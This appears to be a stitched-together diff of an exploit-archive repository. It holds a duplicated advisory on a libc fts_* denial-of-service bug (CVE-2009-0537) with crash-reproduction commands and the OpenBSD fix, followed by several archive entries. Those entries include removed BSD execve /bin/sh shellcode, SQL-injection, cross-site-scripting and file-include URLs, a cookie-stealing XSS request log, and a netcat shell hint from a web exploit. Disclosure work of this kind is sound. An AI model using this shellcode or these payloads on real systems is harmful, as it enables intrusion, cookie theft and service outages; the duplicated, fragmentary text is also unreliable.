"We really wouldn't have to do the maxlen calculations here..."
Here should be some level or pathlen monitor. Should.
short fts_level; /* depth (-1 to N) */
fts_level is short type, no aleph zero
- ---line-247-249---
#define NAPPEND(p) \
(p->fts_path[p->fts_pathlen - 1] == '/' \
? p->fts_pathlen - 1 : p->fts_pathlen)
- ---line-247-249---
this function will crash, when we will requests to wrong allocated memory.
So, what is wrong:
127# pwd
/home/cxib
127# du /home/
4 /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
127# gdb -q du
(no debugging symbols found)
(gdb) r /home/
Starting program: /usr/bin/du /home/
4 /home/cxib/.ssh
Program received signal SIGSEGV, Segmentation fault.
0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385
385 name: t = sp->fts_path + NAPPEND(p->fts_parent);
(gdb) print p->fts_level
$1 = -19001
(gdb) print p->fts_path
$2 = 0x837c9000 <Address 0x837c9000 out of bounds>
and we have answer.
127# cd /home/cxib
127# mkdir len
127# cd len
127# mkdir 24
127# mkdir 23
127# mkdir 22
127# cd 22
127# perl -e '$a="C"x22;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../23/
127# perl -e '$a="C"x23;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../24/
127# perl -e '$a="C"x24;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
/* Will print correctly output */
In all cases, the function should return an error flag "ENAMETOOLONG".
The security consequences can be derived from the crash of the program. All combinations like " while ( fts_read ( ) ) " and " ftw ( ) " function, constitute a potential risk.
Examples of vulnerable programs:
du
rm
chmod -R
chgrp -R
In the case of Microsoft Interix, the situation is very similar.
% uname -a
Interix cxib-PC 6.0 10.0.6030.0 x86 Intel_x86_Family6_Model123_Stepping6
% du pa
Segmentation fault
Vista Enterprise does not allow for the creation of the name too long. At the same time, has great problems with the operation of such nodes.
Using Interix subsystem, you can create a deep tree to the NTFS partition.
example:
fts_level -10000
Then, we can no longer do anything with incorrect directory from the Windows API.
If you try change permissions, copy the directory, you will receive a lot of bugs (stack overflow etc.).
SearchIndexer.exe will crash many times
- ---
Faulting application SearchIndexer.exe, version 7.0.6001.16503, time
stamp 0x483b99af, faulting module msvcrt.dll, version 7.0.6001.18000,
time stamp 0x4791a727, exception code 0x40000015, fault offset
0x00053adb, process id 0x364, application start time 0x01c99276bd383759.
- ---
In some cases, is possible to permanently lock the service.
Interesting behavior we can see an example
C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\Not_existed_node\
(try put this path into explorer)
where
C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\
of course exists
We do not see the potential risk, but the algorithm should be changed.
We publish this note, because the vulnerability was only tested for OpenBSD. Many other systems, reacts strangely to the potential testing.
- --- 2. Fix ---
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c
Fix by Otto Moerbeek:
Index: fts.c
===================================================================
RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- --- fts.c 27 Dec 2008 12:30:13 -0000 1.41
+++ fts.c 10 Feb 2009 09:00:24 -0000
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
len++;
maxlen = sp->fts_pathlen - len;
+ if (cur->fts_level == SHRT_MAX) {
+ (void)closedir(dirp);
+ cur->fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
level = cur->fts_level + 1;
/* Read the directory, attaching each entry to the `link' pointer. */
- --- 3. Greets ---
Very thanks for Otto Moerbeek and all OpenBSD devs.
sp3x Infospec schain Chujwamwdupe p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)
iEYEARECAAYFAkmu7s4ACgkQpiCeOKaYa9ZEjgCg1v0YJVH7nAWmsBnD0szmxY2Q
07cAoMd+Mh8AWxuipuOTVAtBCRmNJVob
=tXhh
-----END PGP SIGNATURE-----
# milw0rm.com [2009-03-05]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[libc:fts_*():multiple vendors, Denial-of-service ]
Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 21.10.2008
- - Pub.: 04.03.2009
CVE: CVE-2009-0537
We are going informing all vendors, about this problem.
Affected Software (official):
- - OpenBSD 4.4
/usr/src/lib/libc/gen/fts.c
- - Microsoft Interix
6.0 10.0.6030.0 x86
- - Microsft Vista Enterprise
SearchIndexer.exe
probably more...
Original URL:
http://securityreason.com/achievement_securityalert/60
- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies.
The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions.
The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy.
typedef struct _ftsent {
unsigned short fts_info; /* flags for FTSENT structure */
char *fts_accpath; /* access path */
char *fts_path; /* root path */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* file name */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level; /* depth (-1 to N) */
int fts_errno; /* file errno */
long fts_number; /* local numeric value */
void *fts_pointer; /* local address value */
struct _ftsent *fts_parent; /* parent directory */
struct _ftsent *fts_link; /* next file structure */
struct _ftsent *fts_cycle; /* cycle structure */
struct stat *fts_statp; /* stat(2) information */
} FTSENT;
- --- 1. libc:fts_*():multiple vendors, Denial-of-service ---
The main problem exist in fts_level from ftsent structure. Type of fts_level is short.
let's see /usr/src/lib/libc/gen/fts.c (OpenBSD)
- ---line-616-625---
/*
* Figure out the max file name length that can be stored in the
* current path -- the inner loop allocates more path as necessary.
* We really wouldn't have to do the maxlen calculations here, we
* could do them in fts_read before returning the path, but it's a
* lot easier here since the length is part of the dirent structure.
*
* If not changing directories set a pointer so that can just append
* each new name into the path.
*/
- ---line-616-625---
"We really wouldn't have to do the maxlen calculations here..."
Here should be some level or pathlen monitor. Should.
short fts_level; /* depth (-1 to N) */
fts_level is short type, no aleph zero
- ---line-247-249---
#define NAPPEND(p) \
(p->fts_path[p->fts_pathlen - 1] == '/' \
? p->fts_pathlen - 1 : p->fts_pathlen)
- ---line-247-249---
this function will crash, when we will requests to wrong allocated memory.
So, what is wrong:
127# pwd
/home/cxib
127# du /home/
4 /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
127# gdb -q du
(no debugging symbols found)
(gdb) r /home/
Starting program: /usr/bin/du /home/
4 /home/cxib/.ssh
Program received signal SIGSEGV, Segmentation fault.
0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385
385 name: t = sp->fts_path + NAPPEND(p->fts_parent);
(gdb) print p->fts_level
$1 = -19001
(gdb) print p->fts_path
$2 = 0x837c9000 <Address 0x837c9000 out of bounds>
and we have answer.
127# cd /home/cxib
127# mkdir len
127# cd len
127# mkdir 24
127# mkdir 23
127# mkdir 22
127# cd 22
127# perl -e '$a="C"x22;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../23/
127# perl -e '$a="C"x23;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../24/
127# perl -e '$a="C"x24;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
/* Will print correctly output */
In all cases, the function should return an error flag "ENAMETOOLONG".
The security consequences can be derived from the crash of the program. All combinations like " while ( fts_read ( ) ) " and " ftw ( ) " function, constitute a potential risk.
Examples of vulnerable programs:
du
rm
chmod -R
chgrp -R
In the case of Microsoft Interix, the situation is very similar.
% uname -a
Interix cxib-PC 6.0 10.0.6030.0 x86 Intel_x86_Family6_Model123_Stepping6
% du pa
Segmentation fault
Vista Enterprise does not allow for the creation of the name too long. At the same time, has great problems with the operation of such nodes.
Using Interix subsystem, you can create a deep tree to the NTFS partition.
example:
fts_level -10000
Then, we can no longer do anything with incorrect directory from the Windows API.
If you try change permissions, copy the directory, you will receive a lot of bugs (stack overflow etc.).
SearchIndexer.exe will crash many times
- ---
Faulting application SearchIndexer.exe, version 7.0.6001.16503, time
stamp 0x483b99af, faulting module msvcrt.dll, version 7.0.6001.18000,
time stamp 0x4791a727, exception code 0x40000015, fault offset
0x00053adb, process id 0x364, application start time 0x01c99276bd383759.
- ---
In some cases, is possible to permanently lock the service.
Interesting behavior we can see an example
C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\Not_existed_node\
(try put this path into explorer)
where
C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\
of course exists
We do not see the potential risk, but the algorithm should be changed.
We publish this note, because the vulnerability was only tested for OpenBSD. Many other systems, reacts strangely to the potential testing.
- --- 2. Fix ---
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c
Fix by Otto Moerbeek:
Index: fts.c
===================================================================
RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- --- fts.c 27 Dec 2008 12:30:13 -0000 1.41
+++ fts.c 10 Feb 2009 09:00:24 -0000
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
len++;
maxlen = sp->fts_pathlen - len;
+ if (cur->fts_level == SHRT_MAX) {
+ (void)closedir(dirp);
+ cur->fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
level = cur->fts_level + 1;
/* Read the directory, attaching each entry to the `link' pointer. */
- --- 3. Greets ---
Very thanks for Otto Moerbeek and all OpenBSD devs.
sp3x Infospec schain Chujwamwdupe p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)
iEYEARECAAYFAkmu7s4ACgkQpiCeOKaYa9ZEjgCg1v0YJVH7nAWmsBnD0szmxY2Q
07cAoMd+Mh8AWxuipuOTVAtBCRmNJVob
=tXhh
-----END PGP SIGNATURE-----
# milw0rm.com [2009-03-05]

29
platforms/bsd_x86/shellcode/13253.c
View file

@ -1,29 +0,0 @@
/*
*BSD version
FreeBSD, OpenBSD, NetBSD.
s0t4ipv6@shellcode.com.ar
57 bytes.
-Encriptado execve(/bin/sh);
Para mas informacion ver
http://www.shellcode.com.ar/es/proyectos.html
*/
char shellcode[]=
"\xeb\x1b\x5e\x31\xc0\x6a\x1a\x6a\x17\x59\x49\x5b\x8a\x04\x0e"
"\xf6\xd3\x30\xd8\x88\x04\x0e\x50\x85\xc9\x75\xef\xeb\x05\xe8"
"\xe0\xff\xff\xff\x0e\x6f\xc7\xf9\xbe\xa3\xe4\xff\xb8\xff\xb2"
"\xf4\x1f\x95\x4c\xfb\xf8\xfc\x1f\x74\x09\xb2\x65";
main()
{
int *ret;
printf("Shellcode lenght=%d\n",sizeof(shellcode));
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
// milw0rm.com [2004-09-26]

12
platforms/bsdi_x86/shellcode/13259.txt
View file

@ -1,12 +0,0 @@
/*
* BSDi
* execve() of /bin/sh by v9 (v9@fakehalo.org)
*/
static char exec[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */
"\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */
"\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */
"\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */
# milw0rm.com [2004-09-26]

9
platforms/cfm/webapps/30202.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24528/info
FuseTalk is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
NOTE: Specific vulnerable versions were not disclosed. Reports also indicate that this issue has been addressed in the latest version of the application.
http://www.example.com/forum/include/error/autherror.cfm?FTVAR_URLP=x&errorcode=[SQL_INJ]

7
platforms/cfm/webapps/30206.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24563/info
FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/forum/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss]

6
platforms/cgi/webapps/1004.php
View file

@ -95,6 +95,6 @@ if (!$s0ck3t) {
}
fclose($s0ck3t);
}
?>
# milw0rm.com [2005-05-20]
?>
# milw0rm.com [2005-05-20]

6
platforms/cgi/webapps/1005.pl
View file

@ -64,6 +64,6 @@ print "\n\n$$$ OK -- Now Try: Nc -v www.host.com 4444 $$$\n";
print "$$ if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP $$\n";
### EOF ###
# milw0rm.com [2005-05-20]
# milw0rm.com [2005-05-20]

17
platforms/cgi/webapps/30156.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: CGILua SQL Injection
# Google Dork: inurl:/cgilua.exe/sys/
# Vendor Homepage: https://web.tecgraf.puc-rio.br/cgilua/
# Version: < = 3.0
# Date: 09/12/2013
# Exploit Author: aceeeeeeeer
# Contact: http://www.twitter.com/aceeeeeeeer
# Tested on: Windows
####################################################################################
greetz: CrazyDuck - Synchr0N1ze - No\one - Kouback_TR_ - unknow_antisec -
elCorpse
Clandestine - MentorSec - Titio Vamp - LLL - Slayer Owner - masoqfellipe
####################################################################################
Exploit: /cgi/cgilua.exe/sys/start.htm?sid=[ SQLi ]
Demo: http://www.server.com/publique/cgi/cgilua.exe/sys/start.htm?sid=157

7
platforms/cgi/webapps/30199.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24516/info
WebIf is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
http://www.example.com/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue

4
platforms/freebsd_x86/shellcode/13273.c
View file

@ -21,6 +21,6 @@ char fbsd_execve[]=
int main() {
void (*run)()=(void *)fbsd_execve;
printf("%d bytes \n",strlen(fbsd_execve));
}
}
// milw0rm.com [2004-09-26]

9
platforms/hardware/dos/30167.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24388/info
Packeteer PacketShaper is prone to a remote denial-of-service vulnerability because the application's web interface fails to properly handle unexpected requests.
Successfully exploiting this issue allows remote, authenticated attackers to reboot affected devices, denying service to legitimate users.
PacketShaper 7.3.0g2 and 7.5.0g1 are vulnerable to this issue; other versions may also be affected.
http://www.example.com/rpttop.htm?OP.MEAS.DATAQUERY=&MEAS.TYPE=

9
platforms/hardware/remote/30164.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24374/info
OfficeConnect Secure Router is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
This issue affects OfficeConnect Secure Router firmware 1.04-168; other versions may also be affected.
http://example.com/cgi-bin/admin?page=1&tk=>[xss]

191
platforms/hardware/webapps/30056.txt
View file

@ -1,191 +0,0 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

218
platforms/hardware/webapps/30145.txt Executable file
View file

@ -0,0 +1,218 @@
Document Title:
===============
Feetan Inc WireShare v1.9.1 iOS - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1157
Release Date:
=============
2013-12-05
Vulnerability Laboratory ID (VL-ID):
====================================
1157
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
WireShare supports more than 30 different file formats, including PDF, EPUB, TXT, CHM,PNG,MP3, RMVB and AVI.
Youre able to import files via EMAIL,Wi-Fi, iTunes File Sharing, the built-in browser, and Dropbox, Box,
SkyDrive, Google Drive and SugarSync.... Files can be arranged in folders, copied, renamed, zipped, and
viewed. You can view the document, read novels, listen to music, view photos, play video, annotate PDF
and share files in WireShare.
(Copy of the Homepage: https://itunes.apple.com/de/app/wireshare-share-files-your/id527465632 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities
in the Feetan Inc WireShare (Share files with your friends) mobile application v1.9.1 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the WireShare v1.9.1 for apple iOS.
A persistent input validation web vulnerability allows remote attackers to inject own malicious script codes on the
application-side (persistent) of the affected application web-server.
The vulnerability is located in the add `New Folder` input field. The vulnerability allows remote attackers to inject
own malicious script codes on the application-side of the index path/folder listing. The script code execute occurs
in the index path/folder listing with the vulnerable foldername parameter. The inject can be done local by the device
via add folder function or by remote inject via web-interface. The second execute occurs when the user is requesting
to delete the malicious injected script code entry of the folder list. The security risk of the persistent input
validation web vulnerability in the foldername value is estimated as high(-) with a cvss (common vulnerability scoring
system) count of 6.4(+)|(-)6.5.
Exploitation of the persistent script code inject vulnerability via POST method request requires low user interaction
and no privileged web-interface user account. In the default settings is auth of the web-server deactivated and blank.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] New Folder (fileListContainer)
Vulnerable Module(s):
[+] folder [name value] (targetItem)
Affected Module(s):
[+] Folder Index List
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with physical device access or
by remote attackers without privileged application user account and low user interaction. For security demonstration
or to reproduce the vulnerability follow the information and steps below.
PoC: Folder Index List - Index
<dt class="tthread">
<p class="hi"></p>
<p class="hn"><b>Name</b></p>
<p class="hs"><b>Size</b></p>
<p class="he"><b>Operation</b></p>
</dt>
<div style="background-image: url("/root/bg_file_list.jpg"); min-height:575px; margin-top: 93px;" id="fileListContainer">
<dd>
<p class="n">
<a href="http://localost:8080/New%20Folder%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E">
<img src="WireShare_files/icon_folder.png" height="30" width="40"></a>
</p>
<p class="p">
<a href="http://localhost:8080/New%20Folder%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E">New Folder <[PERSISTENT INJECTED SCRIPT CODE!].x"></a>
</p>
PoC: Folder Index List - Index
<div style="opacity: 0.5; height: 520px; width: 1349px; position: fixed; left: 0px; top: 0px;
z-index: 1001;" class="simplemodal-overlay" id="simplemodal-overlay"></div><div style="position: fixed;
z-index: 1002; height: 166px; width: 280px; left: 521.5px; top: 176px;" class="simplemodal-container"
id="simplemodal-container"><input class="simplemodal-close" name="cancelButton" id="cancelButton" value="" type="button">
<div style="height: 100%; outline: 0px none; width: 100%; overflow: auto;" class="simplemodal-wrap" tabindex="-1">
<div style="display: block;" class="simplemodal-data" id="modal-content">
<div id="modal-title"><h3>Delete File or Folder</h3></div>
<div id="modal-text"><a>Are you sure to delete it?
</a></div>
<form name="input" action="" method="post">
<div style="display: none;" id="modal-field"><input value="delete" name="operationType" type="hidden">
<input value="[PERSISTENT INJECTED SCRIPT CODE!]" name="originalItem" type="hidden"></div>
<input value="hello this is a test folder" name="ID" id="ID" class="inputone" type="hidden">
<input style="margin: 44px 4px 5px 3px;" value="" name="submitButton" id="submitButton" type="submit">
</form>
</div></div></div></body></html>
--- PoC Session Request Logs [POST] ---
Status: 200[OK]
POST http://192.168.2.106:8080/#
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[-1]
Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Connection[keep-alive]
Post Data:
targetItem[%2520%26%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.vulnerability-lab.com+onload%3Dalert%28document.cookie%29+%3C]
operationType[create]
ID[0]
submitButton[]
Response Headers:
Transfer-Encoding[chunked]
Accept-Ranges[bytes]
Date[Sun, 01 Dec 2013 22:17:30 GMT]
Solution - Fix & Patch:
=======================
The persistent input validation web vulnerability can be patched by a secure encode of the new folder name input field.
Encode and filter also the folder name output list were the malicious context execute has been occured.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
